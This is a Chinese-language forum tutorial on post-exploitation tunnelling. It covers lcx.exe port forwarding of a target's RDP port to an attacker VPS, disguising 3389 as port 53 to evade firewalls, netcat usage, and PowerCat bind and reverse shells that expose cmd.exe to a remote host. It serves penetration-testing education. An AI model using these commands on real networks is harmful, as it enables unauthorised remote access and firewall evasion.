内网渗透:深入解析传输层穿透技术及经典端口转发工具

在渗透测试中,当内外防火墙阻止对特定端口的访问时,通过获得目标机器权限,我们可以利用IPTABLES打开指定端口。在内网存在多层防御系统的情况下,TCP和UDP流量可能受到阻拦,因此我们只能通过允许的端口进行通信。

经典端口转发工具

1. lcx.exe端口转发

内网端口转发:

在目标机器上执行以下命令,将3389端口上的数据转发到公网VPS的4444端口上:

<code>Lcx.exe -slave <公网主机的ip地址> 端口(4444) 127.0.0.1 3389</code>

在VPS上执行以下命令,将4444端口上监听的数据转发到本机的5555端口上:

<code>Lcx.exe -listen 4444 5555</code>

通过远程连接或在VPS上使用mstsc登录主机,即可访问目标服务器的3389端口。

图片[1]-内网渗透:深入解析传输层穿透技术及经典端口转发工具-山海云端论坛

本地端口映射:

如果防火墙限制了目标服务器的部分端口,可以通过端口映射将数据穿透到防火墙允许的其他端口,例如将3389映射给53端口。

图片[2]-内网渗透:深入解析传输层穿透技术及经典端口转发工具-山海云端论坛
<code>Lcx -tran 53 <目标主机ip地址> 3389</code>

2. Netcat (kali自带)

Netcat,也称为nc,是一款网络工具,可用于多种用途,包括获取banner信息、文件传输、远程控制等。

使用示例:

  • 查询命令:nc -h
  • 端口扫描:nc -v 192.168.11.135 80
  • 连接远程主机:nc -nvv 192.168.11.1 80
  • 端口监听:nc -l -p 9999

功能示例:

  1. Banner抓取: 通过获取服务的Banner信息评估漏洞。
  2. 文件传输: 使用Netcat进行文件传输,从目标机器传输文件到本地或相反。
  3. 简易聊天: 在本地VPS主机和目标主机之间进行简易聊天。

3. PowerCat

PowerCat是一款类似于Netcat的PowerShell版本,支持正向、反向连接以及DNS隧道通信。

基本用法:

正向连接:

<code>powercat -l -p 8080 -e cmd.exe -v</code>

反向连接:

<code>powercat -c 192.168.1.2 -p 8888 -v -e cmd.exe</code>

生成payload:

<code>powercat -l -p 8000 -e cmd -v -g >> shell.ps1</code>

DNS隧道通信:

通过PowerCat进行DNS隧道通信,实现反弹shell等功能。

作为跳板机:

使用PowerCat将流量转发,实现内网主机之间的连接。

总结

以上工具和技术为渗透测试提供了多种选择,根据具体场景和需求选择合适的方法进行操作。详细操作和原理请参考相关文档和资源。

© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容